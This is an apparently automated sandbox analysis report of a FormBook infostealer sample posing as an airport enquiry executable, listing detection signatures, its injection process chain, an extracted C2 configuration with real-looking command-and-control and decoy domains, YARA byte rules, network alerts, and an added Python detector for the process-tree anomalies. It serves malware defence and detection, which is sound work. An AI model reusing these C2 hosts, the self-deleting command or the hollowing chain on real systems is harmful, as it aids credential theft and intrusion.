
Windows Analysis Report
New Al Maktoum International Airport Enquiry Ref #2401249.exe

Overview

General Information

Sample name: New Al Maktoum International Airport Enquiry Ref #2401249.exe
Analysis ID: 1499643
MD5: 621c253a4d715e3af16fe8be2fdd8cb1
SHA1: 68ce09cc59887c7f9649f22e6688028957d6c55e
SHA256: 007c997b49ac0889e71757762c82432a975a273eda4c871acec3c0823c6ea530
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • New Al Maktoum International Airport Enquiry Ref #2401249.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe" MD5: 621C253A4D715E3AF16FE8BE2FDD8CB1)
    • svchost.exe (PID: 7456 cmdline: "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • msiexec.exe (PID: 7504 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
          • cmd.exe (PID: 7560 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.wheresthechocolateat.com/pt46/"], "decoy": ["twinportslocal.com", "rovor.store", "98169.club", "mdywl.com", "jrd3s.rest", "aston1717.top", "floridawoodworkingmachinery.com", "17tk555t.com", "ankitsho.shop", "seclameh.com", "realrecordlabel.com", "trenchonbirmingham.com", "af28.top", "rtp1kenzototo.com", "theselflovesite.com", "promotegetpaid.info", "strategiclogisticsagency.com", "learneracademy.net", "per-watch.com", "betbox2341.com", "22958.xyz", "birthdaywishestexts.com", "nihilculturamail.com", "vasymaman.com", "evriukpostaes.sbs", "winkingbots.com", "cb214.pro", "osakanacreation.com", "kingchuxing.com", "dr-cotton.net", "iiixc759q.xyz", "eraplay88rtpgacor.lat", "wguujb.com", "dental-implants-89083.bond", "liposuction-89237.bond", "harbalmaizik.com", "seoservicesdelhi.net", "fakefox.xyz", "wimetimephotos.com", "healthsaveplus.com", "wvufcw948o.top", "dieselrockpartners.com", "istchannelnet.com", "123moviesonl.com", "arlatwestern.shop", "cloudproduction.cloud", "gv3l1.vip", "casino-x-zerkalo27pm.xyz", "serverdayz.com", "dvdripguides.com", "vitalfitness.site", "c21candacedevillier.com", "gory12.online", "0452frl.com", "escpethemtrix.top", "koumimi.tech", "me29hs38g1.com", "dreziuy.xyz", "uddyen.shop", "asia76s.xyz", "melliccine.com", "olxelang.com", "paincareathome.com", "sliveringaf.christmas"]}
Source | Rule | Description | Author | Strings
00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
(34 further entries collapsed in this export)
Source | Rule | Description | Author | Strings
0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
(10 further entries collapsed in this export)

          System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe", CommandLine: "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe", ParentImage: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe, ParentProcessId: 7428, ParentProcessName: New Al Maktoum International Airport Enquiry Ref #2401249.exe, ProcessCommandLine: "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe", ProcessId: 7456, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe", CommandLine: "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe", ParentImage: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe, ParentProcessId: 7428, ParentProcessName: New Al Maktoum International Airport Enquiry Ref #2401249.exe, ProcessCommandLine: "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe", ProcessId: 7456, ProcessName: svchost.exe
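As an added example (not code from the Joe Sandbox report or from the Sigma project), the following Python reproduces the process-tree logic behind the two Sigma hits above and the rest of this report's process chain: a svchost.exe started by something other than the Service Control Manager, a svchost.exe whose command line names a different executable (the hollowed host here carries the dropper's own command line), msiexec.exe launched from explorer.exe with no arguments, and cmd.exe deleting the hollowed host binary. The event records are constructed from the report's process tree, using the Sigma process_creation field names shown in the hits; the allow-list of legitimate svchost.exe parents is an assumption to tune per environment.

```python
"""Added example (not code from the Joe Sandbox report): a Sigma-style pass over
process-creation events reproducing the logic behind the hits above. Field names
follow the Sigma process_creation fields shown in the report (Image, ParentImage,
CommandLine, ProcessId, ParentProcessId). Events are constructed from the report's
process tree plus one benign control; the svchost.exe parent allow-list is an
assumption to tune per environment."""
import re

EVENTS = [
    # Hollowed host: svchost.exe image, started by the dropper and carrying its command line.
    {"ProcessId": 7456, "ParentProcessId": 7428,
     "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "ParentImage": r"C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe",
     "CommandLine": r'"C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe"'},
    # msiexec.exe launched bare from explorer.exe after injection into explorer.
    {"ProcessId": 7504, "ParentProcessId": 2580,
     "Image": r"C:\Windows\SysWOW64\msiexec.exe",
     "ParentImage": r"C:\Windows\Explorer.EXE",
     "CommandLine": r'"C:\Windows\SysWOW64\msiexec.exe"'},
    # Clean-up of the hollowed host binary.
    {"ProcessId": 7560, "ParentProcessId": 7504,
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Windows\SysWOW64\msiexec.exe",
     "CommandLine": r'/c del "C:\Windows\SysWOW64\svchost.exe"'},
    # Constructed benign control: the Service Control Manager starting a service host.
    {"ProcessId": 1234, "ParentProcessId": 700,
     "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
]

# Assumption: parents that legitimately start svchost.exe on a stock Windows 10 host.
LEGIT_SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe", "ngen.exe"}


def basename(path):
    """Lower-cased file name of a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def split_cmdline(cmd):
    """Return (executable token, remaining arguments) for a Windows command line."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        exe, _, rest = cmd[1:].partition('"')
    else:
        exe, _, rest = cmd.partition(" ")
    return exe, rest.strip()


def check_event(ev):
    """Return the list of rule names that fire for one process-creation event."""
    img, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    exe, args = split_cmdline(ev["CommandLine"])
    hits = []
    if img == "svchost.exe" and parent not in LEGIT_SVCHOST_PARENTS:
        hits.append("uncommon_svchost_parent")
    # Image name and command line disagree: what CreateProcess produces when
    # lpApplicationName differs from lpCommandLine, as with the hollowed svchost.exe here.
    if exe.lower().endswith(".exe") and basename(exe) != img:
        hits.append("cmdline_names_other_executable")
    if img == "msiexec.exe" and parent == "explorer.exe" and args == "":
        hits.append("msiexec_from_explorer_without_arguments")
    if img == "cmd.exe" and re.search(r"(?i)\bdel\b.*\\(svchost|msiexec)\.exe", ev["CommandLine"]):
        hits.append("cmd_deletes_system_host_binary")
    return hits


def scan(events):
    """Map ProcessId -> rule names that fired; processes with no hits are omitted."""
    findings = {}
    for ev in events:
        hits = check_event(ev)
        if hits:
            findings[ev["ProcessId"]] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in scan(EVENTS).items():
        print(pid, hits)
```

The image-versus-command-line check is the one worth keeping beyond this sample: the Sigma rule only looks at the parent, but a hollowed svchost.exe that inherits the dropper's command line stands out even when the parent is later made to look plausible.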
Timestamp | SID | Severity | Source Port | Destination Port | Protocol | Classtype
2024-08-27T10:51:57.291670+0200 | 2031412 | 1 | 49737 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-27T10:51:57.291670+0200 | 2031449 | 1 | 49737 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-27T10:51:57.291670+0200 | 2031453 | 1 | 49737 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-27T10:53:20.668970+0200 | 2031412 | 1 | 49738 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-27T10:53:20.668970+0200 | 2031449 | 1 | 49738 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-27T10:53:20.668970+0200 | 2031453 | 1 | 49738 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-27T10:50:53.816844+0200 | 2031412 | 1 | 49739 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-27T10:50:53.816844+0200 | 2031449 | 1 | 49739 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-27T10:50:53.816844+0200 | 2031453 | 1 | 49739 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-27T10:54:21.642054+0200 | 2031412 | 1 | 49741 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-27T10:54:21.642054+0200 | 2031449 | 1 | 49741 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-27T10:54:21.642054+0200 | 2031453 | 1 | 49741 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-27T10:54:01.377326+0200 | 2031412 | 1 | 49740 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-27T10:54:01.377326+0200 | 2031449 | 1 | 49740 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-27T10:54:01.377326+0200 | 2031453 | 1 | 49740 | 80 | TCP | Malware Command and Control Activity Detected

          AV Detection

Source: http://www.dreziuy.xyz | Avira URL Cloud: Label: malware
Source: http://www.iiixc759q.xyz/pt46/ | Avira URL Cloud: Label: malware
Source: http://www.iiixc759q.xyz/pt46/www.sliveringaf.christmas | Avira URL Cloud: Label: malware
Source: http://www.arlatwestern.shop | Avira URL Cloud: Label: phishing
Source: http://www.arlatwestern.shop/pt46/www.betbox2341.com | Avira URL Cloud: Label: phishing
Source: http://www.dreziuy.xyz/pt46/www.af28.top | Avira URL Cloud: Label: malware
Source: http://www.arlatwestern.shop/pt46/?ara=0RpqK4N+sKWumQPIkFOTbgKQJXSBpFKqwGjlCYY5Ihaqw+DawbshP/fsCF3RmMSwrLNm&D8V=_FNDAz | Avira URL Cloud: Label: phishing
Source: http://www.dreziuy.xyz/pt46/ | Avira URL Cloud: Label: malware
Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.wheresthechocolateat.com/pt46/"], "decoy": ["twinportslocal.com", "rovor.store", "98169.club", "mdywl.com", "jrd3s.rest", "aston1717.top", "floridawoodworkingmachinery.com", "17tk555t.com", "ankitsho.shop", "seclameh.com", "realrecordlabel.com", "trenchonbirmingham.com", "af28.top", "rtp1kenzototo.com", "theselflovesite.com", "promotegetpaid.info", "strategiclogisticsagency.com", "learneracademy.net", "per-watch.com", "betbox2341.com", "22958.xyz", "birthdaywishestexts.com", "nihilculturamail.com", "vasymaman.com", "evriukpostaes.sbs", "winkingbots.com", "cb214.pro", "osakanacreation.com", "kingchuxing.com", "dr-cotton.net", "iiixc759q.xyz", "eraplay88rtpgacor.lat", "wguujb.com", "dental-implants-89083.bond", "liposuction-89237.bond", "harbalmaizik.com", "seoservicesdelhi.net", "fakefox.xyz", "wimetimephotos.com", "healthsaveplus.com", "wvufcw948o.top", "dieselrockpartners.com", "istchannelnet.com", "123moviesonl.com", "arlatwestern.shop", "cloudproduction.cloud", "gv3l1.vip", "casino-x-zerkalo27pm.xyz", "serverdayz.com", "dvdripguides.com", "vitalfitness.site", "c21candacedevillier.com", "gory12.online", "0452frl.com", "escpethemtrix.top", "koumimi.tech", "me29hs38g1.com", "dreziuy.xyz", "uddyen.shop", "asia76s.xyz", "melliccine.com", "olxelang.com", "paincareathome.com", "sliveringaf.christmas"]}
Source: http://www.sliveringaf.christmas/pt46/ | Virustotal: Detection: 5%
Source: http://www.theselflovesite.com/pt46/ | Virustotal: Detection: 5%
Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe | ReversingLabs: Detection: 31%
Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe | Virustotal: Detection: 29%
Source: Yara match | File source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe | Joe Sandbox ML: detected
Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: msiexec.pdb source: svchost.exe, 00000001.00000003.1731890191.0000000002A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732589593.0000000002DE0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1731832178.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000003.00000002.4130359525.0000000000970000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: svchost.exe, 00000001.00000003.1731890191.0000000002A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732589593.0000000002DE0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1731832178.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4130359525.0000000000970000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000003.1677807902.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000003.1681546736.0000000004130000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1679568145.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732726618.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1685637489.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732726618.0000000003000000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4131442242.000000000514E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1732637113.0000000004C52000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1734235728.0000000004E07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4131442242.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000003.1677807902.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000003.1681546736.0000000004130000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1679568145.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732726618.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1685637489.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732726618.0000000003000000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000003.00000002.4131442242.000000000514E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1732637113.0000000004C52000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1734235728.0000000004E07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4131442242.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000002.00000002.4144395601.0000000010E1F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.4130764013.00000000031D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4132018408.00000000054FF000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000002.00000002.4144395601.0000000010E1F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.4130764013.00000000031D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4132018408.00000000054FF000.00000004.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CE4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00CE4696
Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CEC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00CEC9C7
Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CEC93C FindFirstFileW,FindClose,0_2_00CEC93C
Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CEF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CEF200
Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CEF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CEF35D
Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CEF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CEF65E
Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CE3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CE3A2B
Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CE3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CE3D4E
Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CEBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CEBF27

          Networking

Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49740 -> 103.224.212.214:80
Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49737 -> 104.18.24.121:80
Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49741 -> 104.18.23.89:80
Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49740 -> 103.224.212.214:80
Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49741 -> 104.18.23.89:80
Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49737 -> 104.18.24.121:80
Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49740 -> 103.224.212.214:80
Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49741 -> 104.18.23.89:80
Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49737 -> 104.18.24.121:80
